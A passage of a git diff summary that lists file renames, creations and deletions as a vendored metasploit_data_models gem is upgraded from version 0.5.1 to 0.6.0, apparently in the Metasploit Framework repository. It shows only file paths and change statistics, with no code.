| 64 +++++++ .../spec/factories/mdm/workspaces.rb | 23 +++ .../spec/lib/base64_serializer_spec.rb | 174 ++++++++++++++++++ .../spec/spec_helper.rb | 9 + ...c => metasploit_data_models-0.6.0.gemspec} | 4 +- 199 files changed, 608 insertions(+), 99 deletions(-) delete mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/Rakefile delete mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/lib/metasploit_data_models/base64_serializer.rb delete mode 100644 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/lib/metasploit_data_models/engine.rb delete mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/lib/base64_serializer_spec.rb rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/.gitignore (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/.rspec (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/.simplecov (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/.yardopts (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/Gemfile (79%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/LICENSE (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/README.md (100%) create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/Rakefile rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/app/models/mdm/api_key.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/app/models/mdm/client.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/app/models/mdm/cred.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/app/models/mdm/event.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/app/models/mdm/exploit_attempt.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/app/models/mdm/exploited_host.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/app/models/mdm/host.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/app/models/mdm/host_detail.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/app/models/mdm/host_tag.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/app/models/mdm/imported_cred.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/app/models/mdm/listener.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/app/models/mdm/loot.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/app/models/mdm/macro.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/app/models/mdm/mod_ref.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/app/models/mdm/module_action.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/app/models/mdm/module_arch.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/app/models/mdm/module_author.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/app/models/mdm/module_detail.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/app/models/mdm/module_mixin.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/app/models/mdm/module_platform.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/app/models/mdm/module_ref.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/app/models/mdm/module_target.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/app/models/mdm/nexpose_console.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/app/models/mdm/note.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/app/models/mdm/profile.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/app/models/mdm/ref.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/app/models/mdm/report.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/app/models/mdm/report_template.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/app/models/mdm/route.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/app/models/mdm/service.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/app/models/mdm/session.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/app/models/mdm/session_event.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/app/models/mdm/tag.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/app/models/mdm/task.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/app/models/mdm/user.rb (87%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/app/models/mdm/vuln.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/app/models/mdm/vuln_attempt.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/app/models/mdm/vuln_detail.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/app/models/mdm/vuln_ref.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/app/models/mdm/web_form.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/app/models/mdm/web_page.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/app/models/mdm/web_site.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/app/models/mdm/web_vuln.rb (72%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/app/models/mdm/wmap_request.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/app/models/mdm/wmap_target.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/app/models/mdm/workspace.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/bin/mdm_console (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/console_db.yml (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/000_create_tables.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/001_add_wmap_tables.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/002_add_workspaces.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/003_move_notes.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/004_add_events_table.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/005_expand_info.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/006_add_timestamps.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/007_add_loots.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/008_create_users.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/009_add_loots_ctype.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/010_add_alert_fields.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/011_add_reports.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/012_add_tasks.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/013_add_tasks_result.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/014_add_loots_fields.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/015_rename_user.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/016_add_host_purpose.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/017_expand_info2.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/018_add_workspace_user_info.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/019_add_workspace_desc.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/020_add_user_preferences.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/021_standardize_info_and_data.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/022_enlarge_event_info.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/023_add_report_downloaded_at.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/024_convert_service_info_to_text.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/025_add_user_admin.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/026_add_creds_table.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/20100819123300_migrate_cred_data.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/20100824151500_add_exploited_table.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/20100908001428_add_owner_to_workspaces.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/20100911122000_add_report_templates.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/20100916151530_require_admin_flag.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/20100916175000_add_campaigns_and_templates.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/20100920012100_add_generate_exe_column.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/20100926214000_add_template_prefs.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/20101001000000_add_web_tables.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/20101002000000_add_query.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/20101007000000_add_vuln_info.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/20101008111800_add_clients_to_campaigns.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/20101009023300_add_campaign_attachments.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/20101104135100_add_imported_creds.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/20101203000000_fix_web_tables.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/20101203000001_expand_host_comment.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/20101206212033_add_limit_to_network_to_workspaces.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/20110112154300_add_module_uuid_to_tasks.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/20110204112800_add_host_tags.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/20110317144932_add_session_table.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/20110414180600_add_local_id_to_session_table.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/20110415175705_add_routes_table.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/20110422000000_convert_binary.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/20110425095900_add_last_seen_to_sessions.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/20110513143900_track_successful_exploits.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/20110517160800_rename_and_prune_nessus_vulns.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/20110527000000_add_task_id_to_reports_table.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/20110527000001_add_api_keys_table.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/20110606000001_add_macros_table.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/20110622000000_add_settings_to_tasks_table.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/20110624000001_add_listeners_table.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/20110625000001_add_macro_to_listeners_table.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/20110630000001_add_nexpose_consoles_table.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/20110630000002_add_name_to_nexpose_consoles_table.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/20110717000001_add_profiles_table.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/20110727163801_expand_cred_ptype_column.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/20110730000001_add_initial_indexes.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/20110812000001_prune_indexes.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/20110922000000_expand_notes.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/20110928101300_add_mod_ref_table.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/20111011110000_add_display_name_to_reports_table.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/20111203000000_inet_columns.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/20111204000000_more_inet_columns.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/20111210000000_add_scope_to_hosts.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/20120126110000_add_virtual_host_to_hosts.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/20120411173220_rename_workspace_members.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/20120601152442_add_counter_caches_to_hosts.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/20120625000000_add_vuln_details.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/20120625000001_add_host_details.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/20120625000002_expand_details.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/20120625000003_expand_details2.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/20120625000004_add_vuln_attempts.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/20120625000005_add_vuln_and_host_counter_caches.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/20120625000006_add_module_details.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/20120625000007_add_exploit_attempts.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/20120625000008_add_fail_message.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/20120718202805_add_owner_and_payload_to_web_vulns.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/20130228214900_change_required_columns_to_null_false_in_web_vulns.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/lib/mdm.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/lib/mdm/host/operating_system_normalization.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/lib/metasploit_data_models.rb (100%) create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/lib/metasploit_data_models/base64_serializer.rb create mode 100644 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/lib/metasploit_data_models/engine.rb rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/lib/metasploit_data_models/serialized_prefs.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/lib/metasploit_data_models/validators/ip_format_validator.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/lib/metasploit_data_models/validators/password_is_strong_validator.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/lib/metasploit_data_models/version.rb (96%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/lib/tasks/yard.rake (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/metasploit_data_models.gemspec (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/script/rails (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/spec/app/models/mdm/web_vuln_spec.rb (80%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/spec/dummy/Rakefile (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/spec/dummy/app/assets/javascripts/application.js (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/spec/dummy/app/assets/stylesheets/application.css (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/spec/dummy/app/controllers/application_controller.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/spec/dummy/app/helpers/application_helper.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/spec/dummy/app/mailers/.gitkeep (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/spec/dummy/app/models/.gitkeep (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/spec/dummy/app/views/layouts/application.html.erb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/spec/dummy/config.ru (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/spec/dummy/config/application.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/spec/dummy/config/boot.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/spec/dummy/config/database.yml.example (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/spec/dummy/config/environment.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/spec/dummy/config/environments/development.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/spec/dummy/config/environments/production.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/spec/dummy/config/environments/test.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/spec/dummy/config/initializers/backtrace_silencers.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/spec/dummy/config/initializers/inflections.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/spec/dummy/config/initializers/mime_types.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/spec/dummy/config/initializers/secret_token.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/spec/dummy/config/initializers/session_store.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/spec/dummy/config/initializers/wrap_parameters.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/spec/dummy/config/routes.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/spec/dummy/db/schema.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/spec/dummy/lib/assets/.gitkeep (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/spec/dummy/log/.gitkeep (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/spec/dummy/public/404.html (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/spec/dummy/public/422.html (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/spec/dummy/public/500.html (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/spec/dummy/public/favicon.ico (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/spec/dummy/script/rails (100%) create mode 100644 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/factories/mdm/addresses.rb create mode 100644 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/factories/mdm/hosts.rb create mode 100644 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/factories/mdm/services.rb create mode 100644 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/factories/mdm/users.rb create mode 100644 